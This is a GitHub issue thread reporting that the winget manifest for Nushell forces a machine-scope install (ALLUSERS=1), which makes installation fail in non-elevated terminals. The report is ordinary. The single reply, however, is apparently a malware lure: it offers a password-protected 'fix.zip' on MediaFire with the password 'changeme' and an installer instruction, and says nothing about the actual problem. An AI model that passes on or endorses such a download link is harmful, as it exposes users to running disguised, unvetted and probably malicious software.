### ISSUE TITLE
[Package Issue]: Nushell.Nushell uses machine-scope installation by default instead of user-scope installation

### ISSUE THREAD

**Issue by pewill** [microsoft/winget-pkgs#169379]
### Please confirm these before moving forward

- [X] I have searched for my issue and not found a work-in-progress/duplicate/resolved issue.
- [X] I have not been informed if the issue is resolved in a preview version of the winget client.

### Category of the issue

Installation issue.

### Brief description of your issue

When installing Nushell.Nushell via winget it uses machine-scope installation by default instead of user-scope installation. 
As a consequence winget installation `winget install --id Nushell.Nushell` fails in a non-eleveted terminal which is not desired (see https://github.com/nushell/nushell/issues/13281 for details)
The culprit is the `ALLUSERS=1` installer switch that was introduced as a manual change in the manifest for version 0.94.2 and is now carried over to subsequent releases.

### Steps to reproduce

1. Start a non elevated terminal
2. run `winget install --id Nushell.Nushell --version 0.97.1`

### Actual behavior

The installation fails with error `Installer failed with exit code: 1603` and in the installation logs the following message is written `You do not have sufficient privileges to complete this installation for all users of the machine`

### Expected behavior

The installation succeeds and Nushell gets installed with user scope

### Environment

```raw
Windows Package Manager v1.8.1911
Windows: Windows.Desktop v10.0.22631.4037
Microsoft.DesktopAppInstaller v1.23.1911.0
```

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
